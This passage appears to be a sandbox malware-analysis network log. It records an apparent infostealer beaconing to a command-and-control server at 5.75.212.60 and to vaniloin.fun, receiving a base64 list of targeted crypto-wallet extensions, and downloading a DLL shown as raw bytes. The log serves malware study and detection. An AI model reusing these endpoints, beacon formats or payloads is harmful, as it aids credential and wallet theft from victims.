2024-07-26 10:57:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAKFCGIJKJKFHIDHIIIEContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------DAKFCGIJKJKFHIDHIIIEContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------DAKFCGIJKJKFHIDHIIIECont
2024-07-26 10:57:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:18 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	60793	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:19 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDAKFCGIJKJKFHIDHII User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:19 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------DHDAKFCGIJKJKFHIDHIIContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------DHDAKFCGIJKJKFHIDHIIContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------DHDAKFCGIJKJKFHIDHIICont
2024-07-26 10:57:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:20 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	60796	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:20 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 6789 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:20 UTC	6789	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------CBAEHCAEGDHJKFHJKFIJContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------CBAEHCAEGDHJKFHJKFIJCont
2024-07-26 10:57:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	60798	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:22 UTC	238	OUT	GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:22 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:22 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Friday, 26-Jul-2024 10:57:22 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-07-26 10:57:22 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-07-26 10:57:22 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-07-26 10:57:22 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-07-26 10:57:22 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-07-26 10:57:22 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-07-26 10:57:22 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-07-26 10:57:23 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-07-26 10:57:23 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-07-26 10:57:23 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-07-26 10:57:23 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	60800	104.21.72.79	443	6264	C:\Users\user\AppData\Local\Temp\1000019001\server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:24 UTC	347	OUT	POST /Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709PyrbqHMCEioUh%2Blkv89lRN48Nn9a3rmWypKncjDf9lPiVhJRxR02Q%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Content-Length: 96 Host: vaniloin.fun
2024-07-26 10:57:24 UTC	96	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 2d 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-07-26 10:57:24 UTC	508	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 10:57:24 GMT Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXjYqUh8jrmDKYTdrAYF3mmF4uVD5Ni%2FgzmQfLIfTVbi8AOpI9wUh1w8ntniBBakTr0XL1x2kDrYjvWYs3A5NnbdKqwrp%2F7HwZuEp1bF1zbSog5fox3HmqqFc1WBlMQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93de5efcb54397-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	60803	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:25 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 10:57:25 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 65 39 34 62 62 63 32 63 38 33 62 36 66 36 33 38 36 64 31 64 30 61 66 63 65 31 32 64 36 63 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 30 63 39 39 65 39 66 66 30 62 39 35 33 35 35 65 38 65 63 31 39 63 35 34 38 61 62 30 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="token"0ee94bbc2c83b6f6386d1d0afce12d6c------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="build_id"e0c99e9ff0b95355e8ec19c548ab0f83------CAAAFCAKKKFBFIDGDBFHCont
2024-07-26 10:57:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 10:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 10:57:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	60805	5.75.212.60	443	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 10:57:26 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
